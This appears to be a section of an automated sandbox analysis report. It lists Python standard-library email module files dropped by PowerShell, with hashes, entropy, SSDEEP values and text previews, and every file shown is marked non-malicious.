                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3997
                                                                                                                                                                                                              Entropy (8bit):5.511359137677274
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:oFncbReNF+G+V0rQ9ysk3IKig2YtzX78okRSvggndf:ucle3zE05ynYtzqgYgn5
                                                                                                                                                                                                              MD5:9AB925EBBD9FE8B4F742CCED661DB5D3
                                                                                                                                                                                                              SHA1:EF08A680D3F4DC13111BBF3D13328D2A26524881
                                                                                                                                                                                                              SHA-256:1223A86086BC88DE63A474B6BC82BED9EB766AB5663295856493FDF1286FF9A8
                                                                                                                                                                                                              SHA-512:23862F384A2D771BBBA9708339C66CD976408D7244C42FECD4DADF98988599D194D10C29728DBEDBC8990A25D6266E4C95D5CEF5FC6E923C34365F8FD6F0F933
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........eR.........................d.....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d...Z.d.d...Z.d.e.f.d...Z.d...Z.e.Z.e.Z.y.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.decoding. To d
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15292
                                                                                                                                                                                                              Entropy (8bit):5.436638772186939
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:h1ZVD+Z+dGfz/pkyZt4ybmbyxkudCdG5bY:hhDkT7pAzuZ5bY
                                                                                                                                                                                                              MD5:E8EDBEFC558B13C6163ED27D1C26CFCB
                                                                                                                                                                                                              SHA1:8DEC74D613A252114C457C46B6D5A4E604912982
                                                                                                                                                                                                              SHA-256:12724EC1A89A5074411B4483A8EA7B102AAE242D44A0EEA66D775F9CB944E0C6
                                                                                                                                                                                                              SHA-512:A26307E115141E86942D06159DCE82431284A454BC0C5988E84569B052713442ACB442B9674C6633F949BD3547CED95205C6C4067BE4F8D3B9175F373DFFB2BF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e5D..............................g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8..Z.d9..Z.d:..Z.d;..Z...G.d<..d=........Z.y.)>)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252..viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1..latin_2z.latin-2..latin_3z.latin-3..latin_4z.latin-4..latin_5z.lat
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2136
                                                                                                                                                                                                              Entropy (8bit):5.245801079339154
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:tmFbZPB52m46FYjTQa/ru+9Mxo/4HOwrE:QFb9B7o6o+zg
                                                                                                                                                                                                              MD5:A19E5F0B16AC422CDA797D41798FD9EB
                                                                                                                                                                                                              SHA1:AA8A02DEE4100C220BB422AFE19FB7E947CF8660
                                                                                                                                                                                                              SHA-256:D3B3700736768C042E1CB93057CE9E553D89F16CDBDF16C4D7E9546A64B6672E
                                                                                                                                                                                                              SHA-512:7335A245A820DBAB7A1C1CE82C67A8D17968C47FC26ACAC4BD2ED3BE1EFA94D67023B8373958F5A6D6A881100ED8AB574A02B7A516E5E68A97BF22FC8C1C2821
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e3.........................F.....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z.d...Z.d...Z.d...Z.y.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc.....................@.....t.........|.d...........}.|.j...................d.d.........S.).NT)...quotetabs..... s....=20)..._encodestring..replace)...s..encs.... .TC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\email\encoders.py.._qencoder........s............T..*.C....;.;.t.V..$..$.....c.....................~.....|.j...................d...........}.t.........t.........|.........d.........}.|.j...................|...........d.|.d.<...y.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..orig..encdatas.... r....r....r........s;...........?.?.$.?..'.D....(.4...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6887
                                                                                                                                                                                                              Entropy (8bit):4.930727386287258
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:sYTQgFYYKvxJ879J58Ce/0J3B4iq7Y1Am70o0IoxDQmbeXCX17S6S+b:sWTFYYKvxJ879J58CQ0J3B4iq7Y1AJoA
                                                                                                                                                                                                              MD5:502F39B64A36EFD32FA26A0B5C556D35
                                                                                                                                                                                                              SHA1:617A0E10461928A7674610A00C0DE7D0BA07CE55
                                                                                                                                                                                                              SHA-256:0A93425A043024A260AD0C24843349D345AC18174B0408C939CFF8239FE05904
                                                                                                                                                                                                              SHA-512:9CC5C347E7FD35364B70E55D6E942E4175043CFD68A6F84D28C8C1D49F193D6AA77ED063CA72F4CD9B7BC3BFDA393F42D5E5BAB4DD976B53ED6F0B3A9AE61986
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e..........................J.....d.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.e.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d e.........Z...G.d!..d"e.........Z...G.d#..d$e.........Z...G.d%..d&e.........Z...G.d'..d(e.........Z...G.d)..d*e.........Z...G.d+..d,e.........Z...G.d-..d.e.........Z...G.d/..d0e.........Z...G.d1..d2e.........Z...G.d3..d4e.........Z.y5)6z email package exception classes.c...........................e.Z.d.Z.d.Z.y.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__........RC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\email\errors.pyr....r.................5r....r....c...........................e.Z.d.Z.d.Z.y.)...MessageParseEr
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19884
                                                                                                                                                                                                              Entropy (8bit):4.936841551289869
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:+NNtVXEP7tPe13bid8VkwY++IIuzEFXZPyzDT:+NNbXsEK/wY++IIbFZST
                                                                                                                                                                                                              MD5:A78965DCCA59216B18AE7C73A4B646DD
                                                                                                                                                                                                              SHA1:E24A1FBA71EBB843DE1AF3A7CBF9FFB83EBE4FE1
                                                                                                                                                                                                              SHA-256:8FCB8FE955DA24CFF8EEA5514B881C3CB17477BD3C9CF58F74A3212F354AE8E7
                                                                                                                                                                                                              SHA-512:E3F15680652C3BB93C0505529790285D3A8379128452E38E438AA7E36EB3B001569B7B604082473AF11733E0DF28F297834F618D252696565AB7CECCBA1D8670
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e"[........................R.....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z.d.Z.d.Z...e.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z.y.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead,
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24621
                                                                                                                                                                                                              Entropy (8bit):5.324019770332638
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:BWILAjn7z0oV85u5tzfSN1IPMp4hA/blqBFyFjZu7KfiF0AUlywc4tPFj5xjX2Pp:BWcAzUy8581SEPMp4OSglu7KfIUPX2x
                                                                                                                                                                                                              MD5:D2E3A5CBA519C3A5544E51BFB2C624A0
                                                                                                                                                                                                              SHA1:99ADFD41280963C46805ECDD8884466B74749173
                                                                                                                                                                                                              SHA-256:1257FA216E283259B83D52E90610D1B249D2AD670FBE51133FBD06CDB570D1BD
                                                                                                                                                                                                              SHA-512:58B8817BC9C69A0F9B936334706E4953DFFC12825B3F12AB661F8C3AF4224BE9AA035186F77035B7A1BE20E3714D7424F8C476266D144706F31EEF5228F276C3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........eY`.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j...................Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.........Z...e.d.........Z...e.j*..................d.e.j,..................e.j...................z...........Z...e.j*..................d.........Z...e.j*..................d.........Z.e.j6..................j8..................Z.d...Z.....d.d...Z...G.d...d.........Z...G.d...d.........Z ..G.d...d.e!........Z"y.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?=
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2866
                                                                                                                                                                                                              Entropy (8bit):5.4218112927868924
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:QmdJ9ILiqKxHV2VsSSYBxzvfrBoHIyfnOJfMbh1FLxIeUiGnuJvjaUcYwV:1zI0f6ezOFMbhnxIYJvgV
                                                                                                                                                                                                              MD5:6D4611EDE2CC961B890DC6F8E97FE090
                                                                                                                                                                                                              SHA1:1D06FD12D887E56C4B1C3737DD5B5C93A50B5AFA
                                                                                                                                                                                                              SHA-256:5B5205049FE03F9714A18AA64D9256B70BBC153DBBAD6BCD660B1216C13B08A1
                                                                                                                                                                                                              SHA-512:E8E46CEA2DFC7CB2C36C7A65F976BEA5880520404081EB29420F4FC4F47F18D849A3AE2E5022BA71CE6C619AAFF02340F045733D6FFA9E751FB7279C0E845E70
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e..........................B.....d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d...Z.d.d...Z.d.d...Z.d.d...Z.y.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc................#.......K.....|.......|.j...........................r.|.j...........................D.]...}.|.j...........................E.d.{.................y.y.7.....w.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subparts.... .UC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\email\iterators.pyr....r........sH..............J.................'..'..)....&.G....|.|.~..%..%....&.......%.s.....;A....A....A..c................#.......K.....|.j...........................D.]8..}.|.j...................|...........}.t.........|.t.................s..&t.........|.........E.d.{..............:..y.7.....w.).z.I
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53076
                                                                                                                                                                                                              Entropy (8bit):5.390386654264264
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:8gPmvSbfmLRi3iPM+jWN/Yq0HYVLvw4Mefu9eBjdgI7oCcABQqJXTREV:xAyeLlXQgp8rA9eld1ch8XT6V
                                                                                                                                                                                                              MD5:818363E5517E748850BAFB93F33D309E
                                                                                                                                                                                                              SHA1:2516310047BCAF5B8176F4E57F4372FCA81B5825
                                                                                                                                                                                                              SHA-256:36D26FF063A07C51CA908A3F1F88D97D26C7A57040682CF1401F06F0FE7142CA
                                                                                                                                                                                                              SHA-512:5A8EDCFC15D9A6D720F0C8705706A4BD9E2583428114E9207213FCDC87E5BAB4BEC272BB3B4CF5F055768A5FAB24E3729F1F6FE37C190BA2E3BF95D6AB82458C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e................................d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j"..................Z.d.Z...e.j&..................d.........Z.d...Z.d.d...Z.d...Z.d...Z.d...Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c..........................t.........|.........j...................d.........\...}.}.}.|.s.|.j...........................d.f.S.|.j...........................|.j...........................f.S.).N..;)...str..partition..strip)...param..a..sep..bs.... .SC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\email\message.py.._splitparamr........sH...........E....$..$.S..).I.A.s.A.......w.w.y.$.........7.7.9.a.g.g.i...........c..........................|...t.........|....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6793
                                                                                                                                                                                                              Entropy (8bit):5.051006796163275
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:KnVkrtME+ueYRgfG4Pl0WjZGHMeJtp++ett+2jFZ5NlJ3yJI8:OgtME+sRgf9aWXeJtpA+iLD33y28
                                                                                                                                                                                                              MD5:5305B7D4F6DBA54C0926D4B11B7704B6
                                                                                                                                                                                                              SHA1:9164DD3F31B940E2E6BCA00454AD28FD6153BA77
                                                                                                                                                                                                              SHA-256:58C01A6ABB4311E6EF09B19FCCEE4323CD0D959405A0A5A619F9439E825B1BAD
                                                                                                                                                                                                              SHA-512:AA86ECD2D8CDA11369D7636F8E007397B53744E7BBC22ABCBCC7A5753EF4D51274A1E0398FEB343503AED77D8E57D881FD241A861DE00F2887D84BF5FBB099FF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e...............................d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z.y.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c.....................*.....e.Z.d.Z.d.e.d...d...Z.d.d...Z.d.d...Z.y.).r....N....policyc..................... .....|.|._.........|.|._.........y.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10015
                                                                                                                                                                                                              Entropy (8bit):5.682322701751066
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:tJEGQ2S1AzLQwZzscqG2FhoPkFXShdJstHifPh:tVpvtjqv3oMFiQYf5
                                                                                                                                                                                                              MD5:9B9C48981D32A52BCCEAD463CCC63FB2
                                                                                                                                                                                                              SHA1:114C2FFD816AA090BB6CAACA37C58B1E77684651
                                                                                                                                                                                                              SHA-256:4BEA0A14BE1B520516A84B60BA88D88222B0E9ED32728A705BB93FC3BBE4BE70
                                                                                                                                                                                                              SHA-512:A55986207C6CF79CC2275F2ABAB7EF2B827F003C25CDA9706A237B7D922C35A1E2EAFB3CC01914AB991B4613CDED1F640B27C22AD7072D656BC155E748F4229F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e.'..............................d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z...e.d.........D...c.g.c.]...}.d.|.z.........c.}.Z.e.d.d...Z.e.d.d...Z.d...e.j...................d.........z.....e.j...................d.........z...D.]...Z...e.e.........e.e.<.......d.e...e.d.........<...d.D.]...Z...e.e.........e.e.<.......d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d.d...Z.e.d.d...Z.d.D.]...Z...e.e.........e.e.<.......[.d.e.f.d...Z.e.f.d...Z.e.Z.e.Z.d...Z.d...Z y.c...c.}.w.).aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12802
                                                                                                                                                                                                              Entropy (8bit):5.503857710937823
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:MPgj8UFSwGHm+BsaSFXZMABzWzGljP0NE:MIj8UnGGqsaSXZtZDNP0e
                                                                                                                                                                                                              MD5:712C25276B7A993075AD8D0A4298EE11
                                                                                                                                                                                                              SHA1:6DC61DF5D57A7FE06FA47C15F30D67AECBFB5DC9
                                                                                                                                                                                                              SHA-256:1E763190033A148BFCC99C634715AA67A401DE392DA4AC9E3AABE3D674224963
                                                                                                                                                                                                              SHA-512:B421C8CAB1B33118B888D7486C925AD95A1A2C7493CB7F2482F597A1A130CB37667502C22E69EABE4E5DD17245DD30A8616D71767F9938DA5659F79D30E97F0E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........ee1.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z...e.j2..................d.........Z...e.j2..................d.........Z.d...Z.d...Z.d d...Z.d...Z.d...Z d!d...Z!d"d...Z"d#d...Z#d...Z$d...Z%d...Z&d...Z'd#d...Z(..e.j2..................d.e.jR..........................Z*d...Z+....d$d...Z,d#d...Z-y.)%z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c.....................D.......|.j.............................y.#.t.........$.r...Y.y.w.x.Y.w.).z;Return True if s may contain surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8774
                                                                                                                                                                                                              Entropy (8bit):4.669757481893706
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:F2gPi1IygNGhdRBp8+HAe+izJkpVkgnrVeqD6kec8ZnN2ENGKTK:F2gPimygNGhjUpBVkgkqD6n9eEh+
                                                                                                                                                                                                              MD5:DD5C15C6C8497B37895EE2DD40483EBC
                                                                                                                                                                                                              SHA1:F6ACB572029D7CD2D41625C7F0DED5B8EB6A313D
                                                                                                                                                                                                              SHA-256:154F585498454CA829DCD44BB89355FF8C7965B1B6692D1AC0293E7553DBBABD
                                                                                                                                                                                                              SHA-512:140555C8F17669C2AC624E0E354021ECAA7F4F24AC6DDA3A1DD19A74371BFCC3FC0C714061362DE84EC8456ECB3381FF6C7D328C4EF25CDA3061C90EBE273324
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: new.bat, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: x.bat, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: new.bat, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: BB.bat, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: AutoRun.bat, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: leo.bat, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: cat.bat, Detection: malicious, Browse
                                                                                                                                                                                                              Preview:""" Routines for manipulating RFC2047 encoded words.....This is currently a package-private API, but will be considered for promotion..to a public API if there is demand....."""....# An ecoded word looks like this:..#..# =?charset[*lang]?cte?encoded_string?=..#..# for more information about charset see the charset module. Here it is one..# of the preferred MIME charset names (hopefully; you never know when parsing)...# cte (Content Transfer Encoding) is either 'q' or 'b' (ignoring case). In..# theory other letters could be used for other encodings, but in practice this..# (almost?) never happens. There could be a public API for adding entries..# to the CTE tables, but YAGNI for now. 'q' is Quoted Printable, 'b' is..# Base64. The meaning of encoded_string should be obvious. 'lang' is optional..# as indicated by the brackets (they are not part of the syntax) but is almost..# never encountered in practice...#..# The general interface for a CTE decoder is that it takes the enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):110252
                                                                                                                                                                                                              Entropy (8bit):4.605220013906025
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:My6wjBQZNdoEVWnGtN8QxRarfxXu/6V7asGYDF956e:swjBMNEGAQxsSe
                                                                                                                                                                                                              MD5:D04F3E17F2790470904CB69155886F51
                                                                                                                                                                                                              SHA1:D89EE507E21EC79281D387BBDB5FCE130E8A6D94
                                                                                                                                                                                                              SHA-256:A519C4F6E07D0F4BD121BEC6A4B6FC60B1F1B00F2466E48AF27115943671F032
                                                                                                                                                                                                              SHA-512:81F890824BCB6A2A4C794280DC480FA576F4E277997F6233FDBADD3E58596EF085EFD4F176646FC50A741F1C87D32FC7F51FC0962C60B3A3A89929E68D0A9650
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""Header value parser implementing various email-related RFC parsing rules.....The parsing methods defined in this module implement various email related..parsing rules. Principal among them is RFC 5322, which is the followon..to RFC 2822 and primarily a clarification of the former. It also implements..RFC 2047 encoded word decoding.....RFC 5322 goes to considerable trouble to maintain backward compatibility with..RFC 822 in the parse phase, while cleaning up the structure on the generation..phase. This parser supports correct RFC 5322 generation by tagging white space..as folding white space only when folding is allowed in the non-obsolete rule..sets. Actually, the parser is even more generous when accepting input than RFC..5322 mandates, following the spirit of Postel's Law, which RFC 5322 encourages...Where possible deviations from the standard are annotated on the 'defects'..attribute of tokens that deviate.....The general structure of the parser follows RFC 5322, and uses its
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18378
                                                                                                                                                                                                              Entropy (8bit):4.40867877161788
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:7rjJPsgHvi2r8ISXiCvXOHjPBDtKU2U1aQQQy1leo7T/i/u6/Gkj:7rZHv5rwXiC2HDmQs1gow
                                                                                                                                                                                                              MD5:ABB8E7D0EECA30077BEC3E11166B853D
                                                                                                                                                                                                              SHA1:13F614028F8727728DD31E98FA628297FC38C0C0
                                                                                                                                                                                                              SHA-256:4960C31F0039780F316149A3773367A3AEEC3BB17D360776334D9B9E688DA908
                                                                                                                                                                                                              SHA-512:8AB6AC0C1512FFA89D68C726144E8FABBAFBA93687F27F7F8B528BD3B2F7C492235FFEC4B0A02FE74563EB15CD3740E0FBDE39271FEC7C58146EDEFE2B13DA41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Copyright (C) 2002-2007 Python Software Foundation..# Contact: email-sig@python.org...."""Email address parsing code.....Lifted directly from rfc822.py. This should eventually be rewritten..."""....__all__ = [.. 'mktime_tz',.. 'parsedate',.. 'parsedate_tz',.. 'quote',.. ]....import time, calendar....SPACE = ' '..EMPTYSTRING = ''..COMMASPACE = ', '....# Parse a date field.._monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',.. 'aug', 'sep', 'oct', 'nov', 'dec',.. 'january', 'february', 'march', 'april', 'may', 'june', 'july',.. 'august', 'september', 'october', 'november', 'december']...._daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']....# The timezone table does not include the military time zones defined..# in RFC822, other than Z. According to RFC1123, the description in..# RFC822 gets the signs wrong, so we can't rely on any such time..# zones. RFC1123 recommends that numeric timezone indicators b
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15447
                                                                                                                                                                                                              Entropy (8bit):4.377685393663711
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5XWVeJxZK+08mJJV22bqcOJ5Ad/8s/4kdztLEldnD98J+Uc7XaRiZFe++GK:5XNXK+cJQedf/4M5LEXnm2F0
                                                                                                                                                                                                              MD5:0C5B89A975BB78A09F8601501DDBF037
                                                                                                                                                                                                              SHA1:949B4A68B8A9DFD7C3A4E9E04DD6C9F0DBB6D76B
                                                                                                                                                                                                              SHA-256:D9F2E3A5E277CFE874E4C47BF643497C51D3B8C4B97124B478DA23407921DAEC
                                                                                                                                                                                                              SHA-512:EA3E1E795470ACF89D61CB31A67AFD7055A3C48204371A9F62B0DADB8FF15F7B771F159DE123F53D939437B1374BA4437D945B6990A5AFAA93B5DA54154DA83B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
